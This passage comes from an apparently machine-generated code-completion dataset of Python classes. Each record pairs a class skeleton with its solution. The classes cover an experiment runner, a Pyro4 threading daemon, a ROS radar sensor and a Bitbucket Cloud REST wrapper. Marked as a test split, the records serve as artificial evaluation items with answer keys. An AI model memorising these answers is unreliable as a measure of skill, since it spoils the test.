:param args: The parsed commandline arguments passed to this program.\n- def run(self): Runs the experiment.", "prompted_full_text": "Implement the Python class `Experiment` described below.\n\nClass description:\nClass representing an experiment, consisting of multiple simulation runs.\n\nMethod signatures and docstrings:\n- def __init__(self, args): Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\n- def run(self): Runs the experiment.\n\n<|skeleton|>\nclass Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n<|end_body_0|>\n\n<|body_start_1|>\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n<|end_body_1|>\n", "revision_id": "a535c2ac0c125175541c3f31181b1d75bf90b63b", "skeleton": "<|skeleton|>\nclass Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. :param args: The parsed commandline arguments passed to this program.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Experiment:\n \"\"\"Class representing an experiment, consisting of multiple simulation runs.\"\"\"\n\n def __init__(self, args):\n \"\"\"Constructs an instance of this class. 
:param args: The parsed commandline arguments passed to this program.\"\"\"\n self.args = args\n self.num_iterations = args.num_iterations\n self.csv_reporter = CSVReporter(args)\n\n def run(self):\n \"\"\"Runs the experiment.\"\"\"\n for iteration in range(self.num_iterations):\n logging.info('Running simulation iteration {}/{}'.format(iteration + 1, self.num_iterations))\n simulation = Simulation(self.args, iteration, self.csv_reporter)\n simulation.run()\n self.csv_reporter.close()\n", "source": "the_stack_v2_python_sparse", "source_path": "danger_zone/experiment.py", "source_repo": "gandreadis/danger-zone", "split": "test", "star_events_count": 0} {"blob_id": "9086f73c862baf94f5f88a771a3da38584ce2846", "bodies": ["self.interval = interval\nthread = threading.Thread(target=self.run, args=())\nthread.start()", "while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()"], "bodies_text": "<|body_start_0|>\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n<|end_body_1|>\n", "class_docstring": "Threading example class The run() method will be started and it will run in the background until the application exits.", "class_name": "ThreadingExample", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000104", "length_bytes": 3896, "license_type": "permissive", "methods": [{"docstring": "Constructor :type interval: int :param interval: Check interval, in seconds", "name": "__init__", "signature": "def __init__(self, interval=1)"}, {"docstring": "Method that runs forever", "name": "run", "signature": "def run(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003279", "prompt": "Implement the Python class `ThreadingExample` described below.\n\nClass description:\nThreading example class The run() method will be started and it will run in the background until the application exits.\n\nMethod signatures and docstrings:\n- def __init__(self, interval=1): Constructor :type interval: int :param interval: Check interval, in seconds\n- def run(self): Method that runs forever", "prompted_full_text": "Implement the Python class `ThreadingExample` described below.\n\nClass description:\nThreading example class The run() method will be started and it will run in the background until the application exits.\n\nMethod signatures and docstrings:\n- def __init__(self, interval=1): Constructor :type interval: int :param interval: Check interval, in seconds\n- def run(self): Method that runs forever\n\n<|skeleton|>\nclass ThreadingExample:\n \"\"\"Threading example class The run() method will be 
started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n<|end_body_1|>\n", "revision_id": "0039e0eb5ad9b4e03e703c7c51295907fec6708d", "skeleton": "<|skeleton|>\nclass ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ThreadingExample:\n \"\"\"Threading example class The run() method will be started and it will run in the background until the application exits.\"\"\"\n\n def __init__(self, interval=1):\n \"\"\"Constructor :type interval: int :param interval: Check interval, in seconds\"\"\"\n self.interval = interval\n thread = threading.Thread(target=self.run, args=())\n thread.start()\n\n def run(self):\n \"\"\"Method that runs forever\"\"\"\n while True:\n global uri\n daemon = Pyro4.Daemon()\n uri = daemon.register(Client)\n daemon.requestLoop()\n", "source": "the_stack_v2_python_sparse", "source_path": "src/example_applications/client_constraint.py", "source_repo": "mazerius/khronos", "split": "test", "star_events_count": 1} {"blob_id": "2501aeb7c1d544958d038dd101de797b0c52793a", "bodies": ["super(Radar, self).__init__(vehicle_id)\nself.name = name\nself.sens_range = float(sens_range)\nself.sens_angle = float(sens_angle) * np.pi / 180.0\nself.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)", "if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\nind = self.vehicle_states[0].tolist().index(self.vehicle_id)\nself_state = self.vehicle_states[:, ind]\nvehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\nrel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\nyaw = self_state[3]\nrot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\nrel_pos = rot * rel_state[(0, 1), :]\nto_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\nrel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\npol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\npol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\nradar_readings = []\nfor v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\nself.pub_readings.publish(RadarReadings(radar_readings))"], "bodies_text": "<|body_start_0|>\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, 
queue_size=10)\n<|end_body_0|>\n\n<|body_start_1|>\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n<|end_body_1|>\n", "class_docstring": "Radar sensor class.", "class_name": "Radar", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the radar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n <|body_0|>\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n<|end_body_0|>\n\n<|body_start_1|>\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000105", "length_bytes": 5525, "license_type": "no_license", "methods": [{"docstring": "Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. 
@param sens_range: I{(float)} Range of the radar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.", "name": "__init__", "signature": "def __init__(self, vehicle_id, name, sens_range, sens_angle)"}, {"docstring": "Publish the sensor readings.", "name": "publish_readings", "signature": "def publish_readings(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000263", "prompt": "Implement the Python class `Radar` described below.\n\nClass description:\nRadar sensor class.\n\nMethod signatures and docstrings:\n- def __init__(self, vehicle_id, name, sens_range, sens_angle): Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the radar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\n- def publish_readings(self): Publish the sensor readings.", "prompted_full_text": "Implement the Python class `Radar` described below.\n\nClass description:\nRadar sensor class.\n\nMethod signatures and docstrings:\n- def __init__(self, vehicle_id, name, sens_range, sens_angle): Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the radar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\n- def publish_readings(self): Publish the sensor readings.\n\n<|skeleton|>\nclass Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the radar sensor. 
@param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n <|body_0|>\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n<|end_body_0|>\n\n<|body_start_1|>\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n<|end_body_1|>\n", "revision_id": "a759b0336b80b5647cc858d99d1fa40a0a9d826d", "skeleton": "<|skeleton|>\nclass Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the radar sensor. @param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n <|body_0|>\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Radar:\n \"\"\"Radar sensor class.\"\"\"\n\n def __init__(self, vehicle_id, name, sens_range, sens_angle):\n \"\"\"Initialize Radar sensor class. @param vehicle_id: I{(int)} ID of the vehicle this sensor belongs to. @param name: I{(str)} Name of the sensor under which it will publish its readings. @param sens_range: I{(float)} Range of the radar sensor. 
@param sens_angle: I{(float)} Opening angle of the radar sensor.\"\"\"\n super(Radar, self).__init__(vehicle_id)\n self.name = name\n self.sens_range = float(sens_range)\n self.sens_angle = float(sens_angle) * np.pi / 180.0\n self.pub_readings = rospy.Publisher(self.name + '_readings', RadarReadings, queue_size=10)\n\n def publish_readings(self):\n \"\"\"Publish the sensor readings.\"\"\"\n if not np.any(self.vehicle_states[0] == self.vehicle_id) or not self.vehicle_states.shape[1] > 1:\n return\n ind = self.vehicle_states[0].tolist().index(self.vehicle_id)\n self_state = self.vehicle_states[:, ind]\n vehicle_states = np.delete(self.vehicle_states, np.s_[ind], 1)\n rel_state = (vehicle_states[(1, 2, 3), :].transpose() - self_state[[1, 2, 3]]).transpose()\n yaw = self_state[3]\n rot = np.asmatrix([[np.cos(yaw), np.sin(yaw)], [-np.sin(yaw), np.cos(yaw)]])\n rel_pos = rot * rel_state[(0, 1), :]\n to_polar = np.vectorize(lambda x, y: (np.hypot(x, y), np.arctan2(y, x)))\n rel_rho, rel_theta = to_polar(rel_pos[0, :], rel_pos[1, :])\n pol_state = np.concatenate((np.array(rel_rho), np.array(rel_theta), [rel_state[2, :]]), axis=0)\n pol_state = pol_state[:, np.all((pol_state[0, :] <= self.sens_range, np.abs(pol_state[1, :]) <= self.sens_angle), axis=0)]\n radar_readings = []\n for v in pol_state.transpose():\n radar_readings.append(Pose2DPolar(v[0], v[1], v[2]))\n self.pub_readings.publish(RadarReadings(radar_readings))\n", "source": "the_stack_v2_python_sparse", "source_path": "sml_world/scripts/sml_modules/sensor_models.py", "source_repo": "marinarantanen/sml_world", "split": "test", "star_events_count": 1} {"blob_id": "43845e3ec61dd8805073af5bd2c0bf7afb20db52", "bodies": ["expected_type = kwargs.pop('expected_type', None)\nsuper(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\nif expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))", "links = self.get_data('links')\nif links is None or link not in links:\n return None\nreturn links[link]['href']", "if params is None:\n params = {}\nif paging_workaround:\n params['page'] = 1\nwhile True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\nreturn", "if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\nelse:\n response.raise_for_status()"], "bodies_text": "<|body_start_0|>\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n<|end_body_0|>\n\n<|body_start_1|>\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n<|end_body_1|>\n\n<|body_start_2|>\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n 
while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n<|end_body_3|>\n", "class_docstring": "", "class_name": "BitbucketCloudBase", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BitbucketCloudBase:\n\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n <|body_0|>\n\n def get_link(self, link):\n \"\"\"Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n <|body_1|>\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n <|body_2|>\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n<|end_body_0|>\n\n<|body_start_1|>\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n<|end_body_1|>\n\n<|body_start_2|>\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = 
True\n params = {}\n trailing = False\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000106", "length_bytes": 4094, "license_type": "permissive", "methods": [{"docstring": "Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing", "name": "__init__", "signature": "def __init__(self, url, *args, **kwargs)"}, {"docstring": "Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present", "name": "get_link", "signature": "def get_link(self, link)"}, {"docstring": "Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements", "name": "_get_paged", "signature": "def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False)"}, {"docstring": "Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:", "name": "raise_for_status", "signature": "def raise_for_status(self, response)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004678", "prompt": "Implement the Python class `BitbucketCloudBase` described below.\n\nClass description:\nImplement the BitbucketCloudBase class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, *args, **kwargs): Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\n- def get_link(self, link): Get a link from the data. 
:param link: string: The link identifier :return: The requested link or None if it isn't present\n- def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False): Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\n- def raise_for_status(self, response): Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:", "prompted_full_text": "Implement the Python class `BitbucketCloudBase` described below.\n\nClass description:\nImplement the BitbucketCloudBase class.\n\nMethod signatures and docstrings:\n- def __init__(self, url, *args, **kwargs): Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\n- def get_link(self, link): Get a link from the data. :param link: string: The link identifier :return: The requested link or None if it isn't present\n- def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False): Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\n- def raise_for_status(self, response): Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\n\n<|skeleton|>\nclass BitbucketCloudBase:\n\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n <|body_0|>\n\n def get_link(self, link):\n \"\"\"Get a link from the data. 
:param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n <|body_1|>\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n <|body_2|>\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expected_type = kwargs.pop('expected_type', None)\n super(BitbucketCloudBase, self).__init__(url, *args, **kwargs)\n if expected_type is not None and (not expected_type == self.get_data('type')):\n raise ValueError('Expected type of data is [{}], got [{}].'.format(expected_type, self.get_data('type')))\n<|end_body_0|>\n\n<|body_start_1|>\n links = self.get_data('links')\n if links is None or link not in links:\n return None\n return links[link]['href']\n<|end_body_1|>\n\n<|body_start_2|>\n if params is None:\n params = {}\n if paging_workaround:\n params['page'] = 1\n while True:\n response = super(BitbucketCloudBase, self).get(url, trailing=trailing, params=params, data=data, flags=flags, absolute=absolute)\n if len(response.get('values', [])) == 0:\n return\n for value in response['values']:\n yield value\n if paging_workaround:\n params['page'] += 1\n else:\n url = response.get('next')\n if url is None:\n break\n absolute = True\n params = {}\n trailing = False\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if 400 <= response.status_code < 600:\n try:\n j = response.json()\n e = j['error']\n error_msg = e['message']\n if e.get('detail'):\n error_msg += '\\n' + e['detail']\n except Exception as e:\n log.error(e)\n response.raise_for_status()\n else:\n raise HTTPError(error_msg, response=response)\n else:\n response.raise_for_status()\n<|end_body_3|>\n", "revision_id": "bb1c0f2d4187ba8efa1a838cd0041b54c944fee8", "skeleton": "<|skeleton|>\nclass BitbucketCloudBase:\n\n def __init__(self, url, *args, **kwargs):\n \"\"\"Init the rest api wrapper :param url: string: The base url used for the rest api. :param *args: list: The fixed arguments for the AtlassianRestApi. :param **kwargs: dict: The keyword arguments for the AtlassianRestApi. :return: nothing\"\"\"\n <|body_0|>\n\n def get_link(self, link):\n \"\"\"Get a link from the data. 
:param link: string: The link identifier :return: The requested link or None if it isn't present\"\"\"\n <|body_1|>\n\n def _get_paged(self, url, params=None, data=None, flags=None, trailing=None, absolute=False, paging_workaround=False):\n \"\"\"Used to get the paged data :param url: string: The url to retrieve :param params: dict (default is None): The parameter's :param data: dict (default is None): The data :param flags: string[] (default is None): The flags :param trailing: bool (default is None): If True, a trailing slash is added to the url :param absolute: bool (default is False): If True, the url is used absolute and not relative to the root :param paging_workaround: bool (default is False): If True, the paging is done on our own because of https://jira.atlassian.com/browse/BCLOUD-13806 :return: A generator object for the data elements\"\"\"\n <|body_2|>\n\n def raise_for_status(self, response):\n \"\"\"Checks the response for errors and throws an exception if return code >= 400 Implementation for Bitbucket Cloud according to https://developer.atlassian.com/cloud/bitbucket/rest/intro/#standardized-error-responses :param response: :return:\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", 